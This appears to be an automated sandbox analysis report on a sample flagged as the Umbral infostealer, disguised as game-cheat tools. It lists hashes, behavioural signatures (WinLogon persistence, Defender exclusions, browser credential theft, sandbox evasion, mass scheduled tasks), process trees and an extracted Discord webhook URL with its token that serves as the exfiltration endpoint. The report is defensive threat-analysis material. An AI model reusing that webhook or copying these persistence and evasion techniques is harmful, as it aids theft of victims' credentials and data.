Analysis
-
max time kernel
350s -
max time network
346s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
12-06-2024 17:17
Static task
static1
Behavioral task
behavioral1
Sample
mc.holyworld.ru.txt
Resource
win10v2004-20240611-en
General
-
Target
mc.holyworld.ru.txt
-
Size
441B
-
MD5
6b5f9725b7fd7348c9c1a70ce5291ecc
-
SHA1
a36ae0a9f29f72e68fe21947841169fb02e6b973
-
SHA256
87bbdc08df5add73d75325002704ab64c57d7e50ebff97b2fc4155b619eb2704
-
SHA512
d60cd62d5e71fe626fdad52dbb5f71865946a55ad44fa49126257565b52fdd8b20d0be42bb02fda7112e78a1f61b28b77109bf00b46e431cb41d88ad3c63afd3
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1250361429333250119/Ue0qgEfIsngTl30ZNCtwzPjGafoMAt1Nkvz6HdtQyp6-br8N7e5NViVMa77MrDft7Ulq
Signatures
-
Detect Umbral payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\Downloads\PowerCheat\HiderLdPlayer.exe family_umbral behavioral1/memory/6020-3607-0x0000020A9BA00000-0x0000020A9BA40000-memory.dmp family_umbral -
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
PowerCheatEmuHider.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Users\\Admin\\AppData\\Roaming\\firefox.exe" PowerCheatEmuHider.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
Processes:
HiderLdPlayer.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts HiderLdPlayer.exe -
Modifies AppInit DLL entries 2 TTPs
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
PowerCheats.exePowerCheatEmuHider.exePowerCheats.exePowerCheatEmuHider.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation PowerCheats.exe Key value queried \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation PowerCheatEmuHider.exe Key value queried \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation PowerCheats.exe Key value queried \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation PowerCheatEmuHider.exe -
Executes dropped EXE 8 IoCs
Processes:
PowerCheats.exePowerCheatEmuHider.exePowerCheatEmuHider.exePowerCheats.exePowerCheatEmuHider.exePowerCheatEmuHider.exeHiderLdPlayer.execonshost.exepid process 5264 PowerCheats.exe 3508 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 1968 PowerCheats.exe 4248 PowerCheatEmuHider.exe 1316 PowerCheatEmuHider.exe 6020 HiderLdPlayer.exe 5612 conshost.exe -
Loads dropped DLL 64 IoCs
Processes:
WmiApSrv.exetaskmgr.exetaskmgr.exePowerCheats.exePowerCheatEmuHider.exePowerCheatEmuHider.exeHiderLdPlayer.exewmic.exepowershell.exepowershell.exepowershell.exepowershell.exewmic.exewmic.exewmic.exepid process 208 4672 4260 5992 4012 WmiApSrv.exe 4660 5088 1232 5980 5860 taskmgr.exe 5364 4616 3024 6020 3044 3068 5368 2320 4580 5112 704 1544 5376 1088 6000 3996 5852 3432 taskmgr.exe 3748 5156 6012 2320 1332 5872 5360 1968 PowerCheats.exe 4092 4248 PowerCheatEmuHider.exe 1316 PowerCheatEmuHider.exe 4464 892 6128 404 6020 HiderLdPlayer.exe 6120 776 wmic.exe 4724 5800 3748 powershell.exe 696 5308 powershell.exe 5936 5200 876 powershell.exe 4856 5548 1872 powershell.exe 1084 4520 3896 wmic.exe 2972 4416 wmic.exe 4724 5132 wmic.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 363 ip-api.com -
Drops file in Windows directory 4 IoCs
Processes:
PowerCheatEmuHider.exePowerCheatEmuHider.exedescription ioc process File created C:\Windows\conshost.exe PowerCheatEmuHider.exe File opened for modification C:\Windows\conshost.exe PowerCheatEmuHider.exe File created C:\Windows\xdwd.dll PowerCheatEmuHider.exe File opened for modification C:\Windows\conshost.exe PowerCheatEmuHider.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exetaskmgr.exetaskmgr.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
firefox.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Creates scheduled task(s) 1 TTPs 64 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4136 schtasks.exe 4208 schtasks.exe 2520 schtasks.exe 4984 schtasks.exe 5968 schtasks.exe 4248 schtasks.exe 3892 schtasks.exe 5308 schtasks.exe 3216 schtasks.exe 3000 schtasks.exe 5276 schtasks.exe 5948 schtasks.exe 5340 schtasks.exe 1448 schtasks.exe 1980 schtasks.exe 5368 schtasks.exe 4660 schtasks.exe 3900 schtasks.exe 5360 schtasks.exe 5444 schtasks.exe 1120 schtasks.exe 1976 schtasks.exe 4280 schtasks.exe 5476 schtasks.exe 1944 schtasks.exe 5240 schtasks.exe 6136 schtasks.exe 5304 schtasks.exe 1384 schtasks.exe 3844 schtasks.exe 5980 schtasks.exe 5968 schtasks.exe 4416 schtasks.exe 1268 schtasks.exe 32 schtasks.exe 1984 schtasks.exe 5840 schtasks.exe 1084 schtasks.exe 5024 schtasks.exe 5956 schtasks.exe 764 schtasks.exe 5276 schtasks.exe 4000 schtasks.exe 816 schtasks.exe 4308 schtasks.exe 3516 schtasks.exe 2064 schtasks.exe 5932 schtasks.exe 1648 schtasks.exe 5428 schtasks.exe 3996 schtasks.exe 6084 schtasks.exe 512 schtasks.exe 5972 schtasks.exe 5968 schtasks.exe 4844 schtasks.exe 5636 schtasks.exe 4604 schtasks.exe 2944 schtasks.exe 1372 schtasks.exe 208 schtasks.exe 2160 schtasks.exe 944 schtasks.exe 4256 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Modifies registry class 1 IoCs
Processes:
firefox.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings firefox.exe -
NTFS ADS 1 IoCs
Processes:
firefox.exedescription ioc process File created C:\Users\Admin\Downloads\PowerCheats.exe:Zone.Identifier firefox.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
NOTEPAD.EXEpid process 1816 NOTEPAD.EXE -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
taskmgr.exePowerCheatEmuHider.exepid process 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe 4456 PowerCheatEmuHider.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
firefox.exePowerCheatEmuHider.exetaskmgr.exetaskmgr.exetaskmgr.exePowerCheatEmuHider.exeHiderLdPlayer.exewmic.exepowershell.exepowershell.exepowershell.exepowershell.exewmic.exedescription pid process Token: SeDebugPrivilege 1468 firefox.exe Token: SeDebugPrivilege 1468 firefox.exe Token: SeDebugPrivilege 4456 PowerCheatEmuHider.exe Token: SeDebugPrivilege 5824 taskmgr.exe Token: SeSystemProfilePrivilege 5824 taskmgr.exe Token: SeCreateGlobalPrivilege 5824 taskmgr.exe Token: SeDebugPrivilege 5860 taskmgr.exe Token: SeSystemProfilePrivilege 5860 taskmgr.exe Token: SeCreateGlobalPrivilege 5860 taskmgr.exe Token: SeDebugPrivilege 1468 firefox.exe Token: SeDebugPrivilege 1468 firefox.exe Token: SeDebugPrivilege 1468 firefox.exe Token: SeDebugPrivilege 3432 taskmgr.exe Token: SeSystemProfilePrivilege 3432 taskmgr.exe Token: SeCreateGlobalPrivilege 3432 taskmgr.exe Token: SeDebugPrivilege 1316 PowerCheatEmuHider.exe Token: SeDebugPrivilege 6020 HiderLdPlayer.exe Token: SeIncreaseQuotaPrivilege 776 wmic.exe Token: SeSecurityPrivilege 776 wmic.exe Token: SeTakeOwnershipPrivilege 776 wmic.exe Token: SeLoadDriverPrivilege 776 wmic.exe Token: SeSystemProfilePrivilege 776 wmic.exe Token: SeSystemtimePrivilege 776 wmic.exe Token: SeProfSingleProcessPrivilege 776 wmic.exe Token: SeIncBasePriorityPrivilege 776 wmic.exe Token: SeCreatePagefilePrivilege 776 wmic.exe Token: SeBackupPrivilege 776 wmic.exe Token: SeRestorePrivilege 776 wmic.exe Token: SeShutdownPrivilege 776 wmic.exe Token: SeDebugPrivilege 776 wmic.exe Token: SeSystemEnvironmentPrivilege 776 wmic.exe Token: SeRemoteShutdownPrivilege 776 wmic.exe Token: SeUndockPrivilege 776 wmic.exe Token: SeManageVolumePrivilege 776 wmic.exe Token: 33 776 wmic.exe Token: 34 776 wmic.exe Token: 35 776 wmic.exe Token: 36 776 wmic.exe Token: SeIncreaseQuotaPrivilege 776 wmic.exe Token: SeSecurityPrivilege 776 wmic.exe Token: SeTakeOwnershipPrivilege 776 wmic.exe Token: SeLoadDriverPrivilege 776 wmic.exe Token: SeSystemProfilePrivilege 776 wmic.exe Token: SeSystemtimePrivilege 776 wmic.exe Token: SeProfSingleProcessPrivilege 776 wmic.exe Token: SeIncBasePriorityPrivilege 776 wmic.exe Token: SeCreatePagefilePrivilege 776 wmic.exe Token: SeBackupPrivilege 776 wmic.exe Token: SeRestorePrivilege 776 wmic.exe Token: SeShutdownPrivilege 776 wmic.exe Token: SeDebugPrivilege 776 wmic.exe Token: SeSystemEnvironmentPrivilege 776 wmic.exe Token: SeRemoteShutdownPrivilege 776 wmic.exe Token: SeUndockPrivilege 776 wmic.exe Token: SeManageVolumePrivilege 776 wmic.exe Token: 33 776 wmic.exe Token: 34 776 wmic.exe Token: 35 776 wmic.exe Token: 36 776 wmic.exe Token: SeDebugPrivilege 3748 powershell.exe Token: SeDebugPrivilege 5308 powershell.exe Token: SeDebugPrivilege 876 powershell.exe Token: SeDebugPrivilege 1872 powershell.exe Token: SeIncreaseQuotaPrivilege 3896 wmic.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
firefox.exetaskmgr.exetaskmgr.exetaskmgr.exepid process 1468 firefox.exe 1468 firefox.exe 1468 firefox.exe 1468 firefox.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5860 taskmgr.exe 5860 taskmgr.exe 5860 taskmgr.exe 5860 taskmgr.exe 5860 taskmgr.exe 5860 taskmgr.exe 5860 taskmgr.exe 5860 taskmgr.exe 5860 taskmgr.exe 5860 taskmgr.exe 5860 taskmgr.exe 5860 taskmgr.exe 5860 taskmgr.exe 5860 taskmgr.exe 3432 taskmgr.exe 3432 taskmgr.exe 3432 taskmgr.exe 3432 taskmgr.exe 3432 taskmgr.exe 3432 taskmgr.exe 3432 taskmgr.exe 3432 taskmgr.exe 3432 taskmgr.exe 3432 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
firefox.exetaskmgr.exetaskmgr.exetaskmgr.exepid process 1468 firefox.exe 1468 firefox.exe 1468 firefox.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5824 taskmgr.exe 5860 taskmgr.exe 5860 taskmgr.exe 5860 taskmgr.exe 5860 taskmgr.exe 5860 taskmgr.exe 5860 taskmgr.exe 5860 taskmgr.exe 5860 taskmgr.exe 5860 taskmgr.exe 5860 taskmgr.exe 5860 taskmgr.exe 5860 taskmgr.exe 5860 taskmgr.exe 5860 taskmgr.exe 3432 taskmgr.exe 3432 taskmgr.exe 3432 taskmgr.exe 3432 taskmgr.exe 3432 taskmgr.exe 3432 taskmgr.exe 3432 taskmgr.exe 3432 taskmgr.exe 3432 taskmgr.exe 3432 taskmgr.exe 3432 taskmgr.exe 3432 taskmgr.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
firefox.exepid process 1468 firefox.exe 1468 firefox.exe 1468 firefox.exe 1468 firefox.exe 1468 firefox.exe 1468 firefox.exe 1468 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
firefox.exefirefox.exedescription pid process target process PID 4876 wrote to memory of 1468 4876 firefox.exe firefox.exe PID 4876 wrote to memory of 1468 4876 firefox.exe firefox.exe PID 4876 wrote to memory of 1468 4876 firefox.exe firefox.exe PID 4876 wrote to memory of 1468 4876 firefox.exe firefox.exe PID 4876 wrote to memory of 1468 4876 firefox.exe firefox.exe PID 4876 wrote to memory of 1468 4876 firefox.exe firefox.exe PID 4876 wrote to memory of 1468 4876 firefox.exe firefox.exe PID 4876 wrote to memory of 1468 4876 firefox.exe firefox.exe PID 4876 wrote to memory of 1468 4876 firefox.exe firefox.exe PID 4876 wrote to memory of 1468 4876 firefox.exe firefox.exe PID 4876 wrote to memory of 1468 4876 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 3908 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 4924 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 4924 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 4924 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 4924 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 4924 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 4924 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 4924 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 4924 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 4924 1468 firefox.exe firefox.exe PID 1468 wrote to memory of 4924 1468 firefox.exe firefox.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\system32\NOTEPAD.EXEC:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\mc.holyworld.ru.txt1⤵
- Opens file in notepad (likely ransom note)
PID:1816
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4876 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1468 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1468.0.1041041115\345272122" -parentBuildID 20230214051806 -prefsHandle 1756 -prefMapHandle 1748 -prefsLen 22076 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {32dd27c0-4992-42bd-a29b-8d58bddcad57} 1468 "\\.\pipe\gecko-crash-server-pipe.1468" 1848 1cf6de0d858 gpu3⤵PID:3908
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1468.1.420784061\1492110976" -parentBuildID 20230214051806 -prefsHandle 2400 -prefMapHandle 2388 -prefsLen 22112 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {43b5184b-cb3c-4a64-b364-c852c0fe00c3} 1468 "\\.\pipe\gecko-crash-server-pipe.1468" 2416 1cf61189658 socket3⤵PID:4924
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1468.2.1673671541\2034008825" -childID 1 -isForBrowser -prefsHandle 2680 -prefMapHandle 2788 -prefsLen 22150 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c971c0e8-2f69-4c20-b61c-7634b3531ded} 1468 "\\.\pipe\gecko-crash-server-pipe.1468" 2808 1cf707e5e58 tab3⤵PID:2952
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1468.3.1386857886\61569168" -childID 2 -isForBrowser -prefsHandle 3904 -prefMapHandle 3900 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e4d7ade-55e7-4764-90c9-86f9c39e9789} 1468 "\\.\pipe\gecko-crash-server-pipe.1468" 3908 1cf72df9258 tab3⤵PID:4932
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1468.4.968917704\1205192986" -childID 3 -isForBrowser -prefsHandle 4036 -prefMapHandle 5244 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {27bc70bd-a5b7-42a1-b416-bb85488bb333} 1468 "\\.\pipe\gecko-crash-server-pipe.1468" 5260 1cf75ed5e58 tab3⤵PID:4432
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1468.5.1619497916\1361289706" -childID 4 -isForBrowser -prefsHandle 5420 -prefMapHandle 5416 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {21bae44c-5d1d-44cf-a606-c1633a1856fb} 1468 "\\.\pipe\gecko-crash-server-pipe.1468" 5428 1cf75ef1f58 tab3⤵PID:4648
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1468.6.603394887\1234892366" -childID 5 -isForBrowser -prefsHandle 5612 -prefMapHandle 5608 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4110e71c-84fe-4811-a36a-01eca1d87004} 1468 "\\.\pipe\gecko-crash-server-pipe.1468" 5260 1cf75eef558 tab3⤵PID:4688
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1468.7.1553145620\1150759375" -childID 6 -isForBrowser -prefsHandle 5908 -prefMapHandle 5900 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {847f57dd-7f1c-4c1d-802c-a5e8cb848382} 1468 "\\.\pipe\gecko-crash-server-pipe.1468" 5896 1cf72b68758 tab3⤵PID:4520
-
-
